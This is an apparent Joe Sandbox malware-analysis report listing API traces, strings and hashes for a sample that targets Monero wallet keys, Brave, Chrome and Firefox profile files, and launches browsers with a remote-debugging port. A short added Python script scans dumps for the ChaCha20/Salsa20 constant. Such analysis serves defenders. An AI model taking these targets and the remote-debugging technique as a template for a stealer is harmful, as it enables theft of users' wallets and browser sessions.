                                    • GetComputerNameA.KERNEL32(?,00000104), ref: 001A7ABF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Similarity
                                    • API ID: Heap$AllocateComputerNameProcess
                                    • String ID:
                                    • API String ID: 1664310425-0
                                    • Opcode ID: b89264a841fc85cef7f28da6658b7e770ceb81beb31b4caca2a559106139d131
                                    • Instruction ID: 99fd66b3b1ad2ba85446bd1c76d37741a04de3a3999fdafe7414aafed066f050
                                    • Opcode Fuzzy Hash: b89264a841fc85cef7f28da6658b7e770ceb81beb31b4caca2a559106139d131
                                    • Instruction Fuzzy Hash: 800186B5A08249ABC704CF98DD45BAFBBB8F705715F100269F506E32C0D7B45A0487A5
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0019112B
                                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 00191132
                                    • ExitProcess.KERNEL32 ref: 00191143
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Similarity
                                    • API ID: Process$AllocCurrentExitNumaVirtual
                                    • String ID:
                                    • API String ID: 1103761159-0
                                    • Opcode ID: b7301244bb8bf909e255e17fdb6ecec336fd5444b96f0b287b2d04d58181863c
                                    • Instruction ID: d7fec3c70194ffa63bffd8cfcd308c464790ea1a2c05686bca40e7fb3c57df4c
                                    • Opcode Fuzzy Hash: b7301244bb8bf909e255e17fdb6ecec336fd5444b96f0b287b2d04d58181863c
                                    • Instruction Fuzzy Hash: 32E01D7098930DFBEB105BA1DD1EB4D777C9B04B15F1001A5F709761D0D7F52540565D
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 001910B3
                                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 001910F7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Similarity
                                    • API ID: Virtual$AllocFree
                                    • String ID:
                                    • API String ID: 2087232378-0
                                    • Opcode ID: 4ada67581d81e6a5c4be6989427ceb6b988d28344c9b310f765026c904f99251
                                    • Instruction ID: 34489cb21b30cd1b72a05fd6f756584455e4c097c7f075e49ada4a725e2396c3
                                    • Opcode Fuzzy Hash: 4ada67581d81e6a5c4be6989427ceb6b988d28344c9b310f765026c904f99251
                                    • Instruction Fuzzy Hash: FBF082B1641318BBEB149AA4AC59FAEB798E705B15F300458F504E7280E6729E409AA5
                                    APIs
                                      • Part of subcall function 001A7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001A7AA0
                                      • Part of subcall function 001A7A70: RtlAllocateHeap.NTDLL(00000000), ref: 001A7AA7
                                      • Part of subcall function 001A7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 001A7ABF
                                      • Part of subcall function 001A79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001911B7), ref: 001A7A10
                                      • Part of subcall function 001A79E0: RtlAllocateHeap.NTDLL(00000000), ref: 001A7A17
                                      • Part of subcall function 001A79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 001A7A2F
                                    • ExitProcess.KERNEL32 ref: 001911C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Similarity
                                    • API ID: Heap$Process$AllocateName$ComputerExitUser
                                    • String ID:
                                    • API String ID: 3550813701-0
                                    • Opcode ID: 3351e8b95bd8b0e952e56bb9180d8e53ac2bbbf74d6e6788b0e9dd9bf78e80b6
                                    • Instruction ID: bed9af7b52efb2dd2b82fd58b0cee4e61e8b8b3d7da19687fa89cfdad61f8357
                                    • Opcode Fuzzy Hash: 3351e8b95bd8b0e952e56bb9180d8e53ac2bbbf74d6e6788b0e9dd9bf78e80b6
                                    • Instruction Fuzzy Hash: 7AE012E9D0430273CE1077B57C07B2B328C5B2634EF040834F905C2142FF65E940417A
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001AAC30: lstrcpy.KERNEL32(00000000,?), ref: 001AAC82
                                      • Part of subcall function 001AAC30: lstrcat.KERNEL32(00000000), ref: 001AAC92
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                    • FindFirstFileA.KERNEL32(00000000,?,001B0B32,001B0B2F,00000000,?,?,?,001B1450,001B0B2E), ref: 0019BEC5
                                    • StrCmpCA.SHLWAPI(?,001B1454), ref: 0019BF33
                                    • StrCmpCA.SHLWAPI(?,001B1458), ref: 0019BF49
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0019C8A9
                                    • FindClose.KERNEL32(000000FF), ref: 0019C8BB
                                    Strings
                                    • \Brave\Preferences, xrefs: 0019C1C1
                                    • Preferences, xrefs: 0019C104
                                    • --remote-debugging-port=9229 --profile-directory=", xrefs: 0019C3B2
                                    • Brave, xrefs: 0019C0E8
                                    • --remote-debugging-port=9229 --profile-directory=", xrefs: 0019C495
                                    • Google Chrome, xrefs: 0019C6F8
                                    • --remote-debugging-port=9229 --profile-directory=", xrefs: 0019C534
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                    • API String ID: 3334442632-1869280968
                                    • Opcode ID: 757f35a89c9b74d3a673fe5df45bbc439ec2f05e8015ec7fb9bbe2d65e62cfb4
                                    • Instruction ID: cb2a3ebc778888ba881e5159ec49fbe5cbcf8eb707e0fde9435a88867b354318
                                    • Opcode Fuzzy Hash: 757f35a89c9b74d3a673fe5df45bbc439ec2f05e8015ec7fb9bbe2d65e62cfb4
                                    • Instruction Fuzzy Hash: ED521476610108ABCF54FB60DDA6EEE737DAF65300F8045A9F50A66091EF306B48CF66
                                    APIs
                                    • wsprintfA.USER32 ref: 001A3B1C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 001A3B33
                                    • lstrcat.KERNEL32(?,?), ref: 001A3B85
                                    • StrCmpCA.SHLWAPI(?,001B0F58), ref: 001A3B97
                                    • StrCmpCA.SHLWAPI(?,001B0F5C), ref: 001A3BAD
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 001A3EB7
                                    • FindClose.KERNEL32(000000FF), ref: 001A3ECC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                    • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                    • API String ID: 1125553467-2524465048
                                    • Opcode ID: 786ec5fbba85f9b2f93f777b16b9f0e24afd751dd6af468c505d1c679ac8b580
                                    • Instruction ID: 277ba54444485c0f845de03d7b5520a026d194682450df0f0dfb0ee00b36048e
                                    • Opcode Fuzzy Hash: 786ec5fbba85f9b2f93f777b16b9f0e24afd751dd6af468c505d1c679ac8b580
                                    • Instruction Fuzzy Hash: EBA15EB5A00208ABDB24DFA4DC85FEA7379BF59304F044599F61D96181EB709B88CF62
                                    APIs
                                    • wsprintfA.USER32 ref: 001A4B7C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 001A4B93
                                    • StrCmpCA.SHLWAPI(?,001B0FC4), ref: 001A4BC1
                                    • StrCmpCA.SHLWAPI(?,001B0FC8), ref: 001A4BD7
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 001A4DCD
                                    • FindClose.KERNEL32(000000FF), ref: 001A4DE2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                     • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s$%s\%s$%s\*$@
                                    • API String ID: 180737720-3454383066
                                    • Opcode ID: 16cba2c770f0a1f393598813299f845106862641544b45809eb394c69e667fe3
                                    • Instruction ID: afac0ab26769d5cfbb6d4a0cba224d7b7ab2e34a74a0a010215b9d9b178dc382
                                    • Opcode Fuzzy Hash: 16cba2c770f0a1f393598813299f845106862641544b45809eb394c69e667fe3
                                    • Instruction Fuzzy Hash: BF615675900219ABCB24EBA0DC45FEA737CBB59704F4086DCF60996151FBB0AB84CFA5
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 001A47D0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 001A47D7
                                    • wsprintfA.USER32 ref: 001A47F6
                                    • FindFirstFileA.KERNEL32(?,?), ref: 001A480D
                                    • StrCmpCA.SHLWAPI(?,001B0FAC), ref: 001A483B
                                    • StrCmpCA.SHLWAPI(?,001B0FB0), ref: 001A4851
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 001A48DB
                                    • FindClose.KERNEL32(000000FF), ref: 001A48F0
                                    • lstrcat.KERNEL32(?,00E2EB40), ref: 001A4915
                                    • lstrcat.KERNEL32(?,00E2DE28), ref: 001A4928
                                    • lstrlen.KERNEL32(?), ref: 001A4935
                                    • lstrlen.KERNEL32(?), ref: 001A4946
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                     • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                    • String ID: %s\%s$%s\*$@
                                    • API String ID: 671575355-1548028435
                                    • Opcode ID: 5a341143918b295bccd269c06f2411d636c105ef9dc85a8570617ded375692b3
                                    • Instruction ID: 008157d3792b67f5e1a160edadff8076a97d56c98bec219ee41b217e9820c239
                                    • Opcode Fuzzy Hash: 5a341143918b295bccd269c06f2411d636c105ef9dc85a8570617ded375692b3
                                    • Instruction Fuzzy Hash: FD5196B5904208ABCB24EB70DC99FEE737CAB59304F404698F60996150FBB4DB84CFA5
                                    APIs
                                    • wsprintfA.USER32 ref: 001A4113
                                    • FindFirstFileA.KERNEL32(?,?), ref: 001A412A
                                    • StrCmpCA.SHLWAPI(?,001B0F94), ref: 001A4158
                                    • StrCmpCA.SHLWAPI(?,001B0F98), ref: 001A416E
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 001A42BC
                                    • FindClose.KERNEL32(000000FF), ref: 001A42D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                     • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s$@$p
                                    • API String ID: 180737720-1016689098
                                    • Opcode ID: 550901cccb827bbd136bbc3becb5ed32f705dd17ab62d9ee7ac00644a45c277d
                                    • Instruction ID: 0fd1b0351af3342d72a0e2d6fc8261224801752a4685aa3635a6a13d504a3740
                                    • Opcode Fuzzy Hash: 550901cccb827bbd136bbc3becb5ed32f705dd17ab62d9ee7ac00644a45c277d
                                    • Instruction Fuzzy Hash: 1B5166B5904218ABCB24EBB0DC95EEA737CBB59304F4046D9F60996050FBB0AB85CF65
                                    APIs
                                    • wsprintfA.USER32 ref: 0019EE3E
                                    • FindFirstFileA.KERNEL32(?,?), ref: 0019EE55
                                    • StrCmpCA.SHLWAPI(?,001B1630), ref: 0019EEAB
                                    • StrCmpCA.SHLWAPI(?,001B1634), ref: 0019EEC1
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0019F3AE
                                    • FindClose.KERNEL32(000000FF), ref: 0019F3C3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                     • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\*.*
                                    • API String ID: 180737720-1013718255
                                    • Opcode ID: a0b97bf27e9eadd2a5b35bbc53dd79735edf7b8c65b6ce560baad6bd1c8a4f0e
                                    • Instruction ID: 0e72ada6a0045ed12acab58e3129c60d85a7a6d3f93d0a94567ec20be7fb4229
                                    • Opcode Fuzzy Hash: a0b97bf27e9eadd2a5b35bbc53dd79735edf7b8c65b6ce560baad6bd1c8a4f0e
                                    • Instruction Fuzzy Hash: 64E1F575911218AADB94FB60CC62EEE737DAF65300F8045D9F50A62092EF706F89CF61
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                     • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                    • API String ID: 0-1562099544
                                    • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                    • Instruction ID: 1b7d06be12ead95299c78830707e91bbba73c0b8902a5b8207e1c70cae65e919
                                    • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                    • Instruction Fuzzy Hash: 78E276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
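                                     The String ID of the entry above lists the fragments "expa", "nd 3", "2-by" and "te k". Those are the four 32-bit words of the Salsa20/ChaCha20 key-setup constant "expand 32-byte k": compiled key setup loads the constant as four separate immediates, so a string scanner sees the 4-byte pieces (and, where two immediates happen to be adjacent, runs like "expand 32-by") rather than the whole text. The Python below is an added example written for this page, not code from the report, from Joe Sandbox or from the analysed sample; it scans a raw dump for the constant in both the contiguous and the split form and reports the address of each hit relative to a caller-supplied load base. The SAMPLE bytes are constructed for the example, not taken from file.exe, and finding the constant only places the code in the Salsa20/ChaCha20 family; the report alone does not say which member the sample implements.

```python
"""
Added example (not from the Joe Sandbox report): locate the Salsa20/ChaCha20
key-setup constant "expand 32-byte k" in a raw code/data blob, both as one
contiguous 16-byte string and as the four 32-bit words ("expa", "nd 3",
"2-by", "te k") that compiled key setup stores as separate immediates.
"""
import struct

SIGMA = b"expand 32-byte k"
# The cipher consumes the constant as four little-endian u32 words. A compiler
# emits them as four separate immediates, which is why a string scanner shows
# the 4-byte fragments "expa", "nd 3", "2-by", "te k" instead of the whole text.
SIGMA_WORDS = [SIGMA[i:i + 4] for i in range(0, 16, 4)]
SIGMA_U32 = [struct.unpack("<I", w)[0] for w in SIGMA_WORDS]  # 0x61707865, ...


def find_all(blob, needle):
    """Yield every offset at which needle occurs in blob."""
    start = 0
    while True:
        idx = blob.find(needle, start)
        if idx < 0:
            return
        yield idx
        start = idx + 1


def find_sigma(blob, window=64, base=0):
    """
    Return hits sorted by offset. Each hit is a dict:
      kind   : "contiguous" (whole 16-byte string) or "split" (four immediates)
      offset : offset of the string, or of the "expa" word for a split hit
      va     : base + offset, so hits can be matched against a dump's addresses
      words  : offsets of the four words in constant order
    A split hit requires all four words within `window` bytes of "expa"; a
    stray "expa" with no partners nearby (ordinary text) is not reported.
    """
    hits = []
    for off in find_all(blob, SIGMA):
        hits.append({"kind": "contiguous", "offset": off, "va": base + off,
                     "words": [off + 4 * i for i in range(4)]})

    word_offsets = {w: list(find_all(blob, w)) for w in SIGMA_WORDS}
    for off0 in word_offsets[SIGMA_WORDS[0]]:
        if blob[off0:off0 + 16] == SIGMA:
            continue  # already reported as a contiguous hit
        chosen = [off0]
        for w in SIGMA_WORDS[1:]:
            near = [o for o in word_offsets[w] if abs(o - off0) <= window]
            if not near:
                break
            chosen.append(min(near, key=lambda o: abs(o - off0)))
        else:
            hits.append({"kind": "split", "offset": off0, "va": base + off0,
                         "words": chosen})
    hits.sort(key=lambda h: h["offset"])
    return hits


def scan_file(path, base=0, window=64):
    """Scan a dumped region on disk; pass the region's load address as base."""
    with open(path, "rb") as f:
        return find_sigma(f.read(), window=window, base=base)


# Constructed sample, not bytes from the analysed file: a 32-bit function that
# stores the four words as mov-immediates, a lone decoy "expa", and a copy of
# the full string as it would sit in a data section.
SAMPLE = (
    b"\x55\x8b\xec\x83\xec\x10"            # push ebp; mov ebp,esp; sub esp,0x10
    + b"\xc7\x45\xf0" + SIGMA_WORDS[0]     # mov dword [ebp-0x10], 'expa'
    + b"\xc7\x45\xf4" + SIGMA_WORDS[1]     # mov dword [ebp-0x0c], 'nd 3'
    + b"\x90\x90\x90"                      # unrelated instructions in between
    + b"\xc7\x45\xf8" + SIGMA_WORDS[2]     # mov dword [ebp-0x08], '2-by'
    + b"\xc7\x45\xfc" + SIGMA_WORDS[3]     # mov dword [ebp-0x04], 'te k'
    + b"\x8b\xe5\x5d\xc3"                  # mov esp,ebp; pop ebp; ret
    + b"\x00" * 200
    + b"expa"                              # decoy: one word, no partners nearby
    + b"\x00" * 200
    + SIGMA                                # contiguous copy
    + b"\x00" * 16
)

if __name__ == "__main__":
    for h in find_sigma(SAMPLE, base=0x190000):
        print(f"{h['kind']:10s} va=0x{h['va']:08x} "
              f"words={[hex(w) for w in h['words']]}")
```

                                     Against a real dump, call scan_file() with the region's load address as base so the reported va values line up with the "ref:" addresses in entries like the one above; a split hit inside a function is the key-setup routine itself, while a contiguous hit usually points at the constant in a data section that the routine loads from.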
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001AAC30: lstrcpy.KERNEL32(00000000,?), ref: 001AAC82
                                      • Part of subcall function 001AAC30: lstrcat.KERNEL32(00000000), ref: 001AAC92
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001B16B0,001B0D97), ref: 0019F81E
                                    • StrCmpCA.SHLWAPI(?,001B16B4), ref: 0019F86F
                                    • StrCmpCA.SHLWAPI(?,001B16B8), ref: 0019F885
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0019FBB1
                                    • FindClose.KERNEL32(000000FF), ref: 0019FBC3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                     • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: prefs.js
                                    • API String ID: 3334442632-3783873740
                                    • Opcode ID: bc88bffb3cd0052a71c1140efbd3aa4311139a5634356bad92e09e78daa07e0c
                                    • Instruction ID: 218d87a74d34f88ddbe790ca696ee66aeb6f090a68c26c0d28c27b15e87cec9a
                                    • Opcode Fuzzy Hash: bc88bffb3cd0052a71c1140efbd3aa4311139a5634356bad92e09e78daa07e0c
